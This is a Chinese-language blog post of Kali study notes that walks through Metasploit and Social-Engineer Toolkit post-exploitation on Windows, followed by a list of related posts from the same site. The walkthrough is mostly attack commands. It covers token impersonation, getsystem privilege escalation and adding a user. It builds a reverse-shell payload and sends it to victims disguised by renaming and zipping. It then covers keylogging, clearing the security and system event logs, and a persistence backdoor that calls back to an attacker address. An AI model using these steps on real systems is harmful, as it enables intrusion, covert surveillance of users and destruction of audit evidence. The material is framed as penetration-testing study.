权限提升(SET)

最新推荐文章于 2024-04-25 15:30:00 发布
最新推荐文章于 2024-04-25 15:30:00 发布
阅读量424 收藏 1
点赞数
分类专栏: Kali学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44111753/article/details/111110148
版权

1、使用假冒令牌
1)、启动meterpreter会话,执行命令
sessions -i 1
2)、use incognito加载incognito模块,然后列举出令牌
3)、help查看帮助信息,了解列举令牌的命令
4)、list_tokens -u 列举出所有的令牌
5)、impersonate_token命令假冒用户进行攻击
impersonate_token user
2、本地权限提升
1)、启动meterpreter会话
sessions -i 1
2)、使用getsystem命令提升本地权限、
getsystem -h 查看该命令的帮助嘻嘻
3)、执行命令 getsystem提升权限(自动选择方法1)
4)add_user bob 1231 -h ip #创建用户
3、使用社会工程学工具包
1)、setoolkit 启动SET
在这里插入图片描述
2)、选择社会工程学,将显示如下信息
在这里插入图片描述
3)、创建一个攻击载荷和监听器,即输入编号4
在这里插入图片描述
输出信息显示了可生成的所有攻击载荷,根据目标系统选择相应的攻击载荷
4)、假设攻击的目标系统win,选择编号2
5)、将该过程与指定的ip和端口绑定,将打开一个handler,并生成payload,将ip地址与端口绑定,是因为主机上可能存在多个网卡,但是端口号是不可变的,这样监听器将等待被渗透攻击的系统来连接,并且负责这些网络连接
在这里插入图片描述
在这里插入图片描述

4、传递攻击载荷给目标系统
payload:是指用户系统目标系统在被渗透攻击之后执行的代码
例如:反弹shell是一种从目标系统到攻击主机创建的网络连接,并提供命令行shell的攻击载荷
Bind Shell攻击载荷则在目标系统上将命令行shell绑定到一个打开的监听端口,攻击者可以连接这些端口取得shell交互
1)、社会工程学工具的攻击载荷默认在/root/.set/payload.exe,将其发送到目标主机(邮件发送或者存储在U盘)
在这里插入图片描述
2)、mv payload.exe xx 修改文件名
3)、zip xxx payload.exe用zip命令压缩该文件
4)、当目标系统打开内容后,将在msf handler下建立一个活跃的会话
5、收集目标系统数据
1)激活meterpreter会话
sessions -i 1
2)开启键盘记录器
keyscan_start
3)收集目标系统中的数据
keyscan_dump
6、清除踪迹
1)激活meterpreter会话
sessions -i 1
2)irb 命令清除踪迹
输出信息中看到>>提示符,表示成功运行了irb命令
3)设置想要删除的日志,常用日志选项如下

  log=client.sys.eventlog.open('system');
  log=client.sys.eventlog.open('security');
  log=client.sys.eventlog.open('application');
  log=client.sys.eventlog.open('directory service');
  log=client.sys.eventlog.open('dns server');
  log=client.sys.eventlog.open('file replication service');

上述命令指定了要清除的日志,最后,log.clear清除日志文件
7、创建持久后门
1)激活meterpreter会话
sessions -i 1
2)查看帮助文档
run persistence -h
3)创建一个持久后门
run persistence -U -A -i 10 - 8090 -r $IP #将在目标系统中创建一个持久脚本,并且脚本将在目标主机上自动运行

参考书籍:Kali Linux渗透测试技术详解

行于其野
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
20222807 2022-2023-2 《网络攻防实践》第十一周作业
cc3da的博客
05-22 309
《网络攻防实践》第十一周作业
内网渗透总结一:第一步提权
yggcwhat
05-06 2291
内网渗透总结一:第一步提权!!!
【win权限提升】教你从0基础入门到精通,收藏这一篇就够了!
最新发布
logic1001的博客
04-25 3894
土豆(potato)提权通常用在我们获取WEB/数据库权限的时候,可以将低权限的服务用户提升为“NT AUTHORITY\SYSTEM”特权。**土豆提权原理:**土豆系列提权的核心是NTLM中继,通过欺骗运行在高权限(Administrator/SYSTEM)的账户进行ntlm认证,同时作为中间人对认证过程进行劫持和重放,最后调用本地认证接口使用高权限账号的ntml认证获取一个高权限token,只要当前进程拥有SeImpersonatePrivilege权限即可进行令牌模仿,即可取得对应权限
权限提升Linux篇
weixin_56537388的博客
09-19 471
我们前面使用SUID提权的时候,其实很多命令都有SUID权限,但是为什么只有find等命令才可以作为提权命令呢,这是由这些命令的功能决定的,如果find没有exec这个参数,那他也不能用来提权,就比如拥有管理员权限的ping命令,但是可以用来提权吗,显然不能。在程序运行的时候,经常需要给程序以高权限,类似于Windows里的以管理员身份运行,通过上面的命令增加SUID,使普通用户可以以root用户的身份运行程序。现在尝试用SUID提权,使用上面的SUID提权网站。攻击者连接受害者主机。
权限提升:网站后台.(提权思路.)
网络安全领域___专研者.
04-18 1792
权限提升简称提权,由于操作系统都是多用户操作系统,用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。
Windows权限提升
2301_76786857的博客
01-12 991
提权可分为纵向提权与横向提权:纵向提权:低权限角色获得高权限角色的权限;横向提权:获取同级别角色的权限。Windows常用的提权方法有:系统内核溢出漏洞提权、数据库提权、错误的系统配置提权、组策略首选项提权、WEB中间件漏洞提权、DLL劫持提权、滥用高危权限令牌提权、第三方软件/服务提权等。
动网7.0sp2前后台权限提升工具.exe
09-05
可以提权 update [dv_user] set usergroupid=1 where username='前台user';insert into dv_admin (flag,username,[password],adduser) values ('1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25...
mysql给root开启远程访问权限,修改root密码
10-28
但是随着网站流量的增加,后期服务器架构可能会将Web-Server与Mysql-Server分别放在独立的服务器上,以便得到更大性能的提升。在这种情况下,Mysql-Server就需要修改成允许Web-Server进行远程连接。 二、修改Mysql-...
做好SQL Server配置提升数据库性能
11-06
一:前言  在新安装SQL Server 2005/2008之后,我们需要根据Server软硬件设施对SQL Server做一些配置,以至能够发挥较好的性能。... Automatically set processor affinity mask for all processors:可以设置SQL Se
通过批处理提升权限,快速设置IP地址,(win7可用)
04-23
通过批处理提升权限,快速设置IP地址,(win7可用),winxp的话只用其中的setip.bat 即可。
linux系统权限管理文件特殊权限PPT学习教案.pptx
10-01
SetUID 权限只在文件执行过程中有效,即只有在文件被执行时,执行者的身份会被暂时提升为文件所有者的身份。SetUID 权限可以应用于可执行的二进制程序,例如 /usr/bin/locate。 SetGID 权限 SetGID(Set Group ID...
利用Windows系统服务进行权限提升
good good study
01-26 3239
提权是后渗透重要的一环节,如果当前获取的用户权限比较低,那么我们将无法访问受保护的系统资源或执行系统管理操作,影响后续的攻击过程。这要求我们通过各种手段将当前用户的权限进行提升,以满足后续攻击的要求。
权限提升(提权)一
weixin_45626840的博客
12-02 989
权限提升
Session详解
i'm CHEN
10-26 645
目录:一、术语session二、HTTP协议与状态保持三、理解cookie机制四、理解session机制五、理解javax.servlet.http.HttpSession六、HttpSession常见问题七、跨应用程序的session共享八、总结参考文档一、术语session在我的经验里,session这个词被滥用的程度大概仅次于transaction,更加有趣的是transaction与s
权限提升
m0_65332604的博客
04-06 1209
提权,顾名思义就是提高自己在服务器中的权限,就比如在Windows中,你本身登陆的用户是Guest,通过提权后,就会变成超级管理员,拥有了管理Windows的所有权限。以下是常见几种提权方式: 1.Bypass UAC UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运
【kali-权限提升】(4.1)假冒令牌攻击、本地提权:流程
08-07 1105
【kali-权限提升】假冒令牌攻击、本地提权
命令行自动提升管理员权限
gogogo的专栏
12-18 1万+
通过快捷方式在命令行自动提升到管理员权限
linux临时提升管理员权限(sudo方法)
热门推荐
天天吞吞吐吐跳跳糖
08-21 1万+
定义        sudo命令用来以其他身份来执行命令,预设的身份为root。在/etc/sudoers中设置了可执行sudo指令的用户。若其未经授权的用户企图使用sudo,则会发出警告的邮件给管理员。用户使用sudo时,必须先输入密码,之后有5分钟的有效期限,超过期限则必须重新输入密码。  语法         sudo(选项)(参数)         例如:sudo pass
权限提升部分思路
weixin_51387754的博客
06-02 312
权限提升 权限提升简称提权。现在的操作系统都是多用户操作系统,用户之间都有权限控制,比如通过web漏洞拿到的是web进程的权限,往往web服务都是一个权限很低的账号启动的,因此通过webshell进行一些操作会受到限制,这就需要将其提升为管理甚至是System权限。 一、Windows提权 范围较广主要的提权方式还是利用自身漏洞或者错误配置,例如利用缓冲区溢出提权、windows错误系统配置提权、任意用户以NTAUTHORIITY\SYSTEM权限安装MSI提权、启动项和组策略提权、计划任务提权和进程注入提
批处理脚本提升管理员权限
06-01
提升批处理脚本的管理员权限,可以使用以下方法: 1. 右键点击批处理脚本,选择“以管理员身份运行”。 2. 在批处理脚本中添加以下代码: ``` @echo off >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"="" echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" ``` 这段代码会在脚本运行时检查用户是否拥有管理员权限,如果没有,则请求管理员权限。如果用户同意,则以管理员身份重新启动脚本。 请注意,这种方法需要用户同意提升权限,因此不适用于自动化脚本。如果您需要在无需用户干预的情况下提升管理员权限,请考虑使用其他方法,如使用Windows任务计划程序或第三方工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值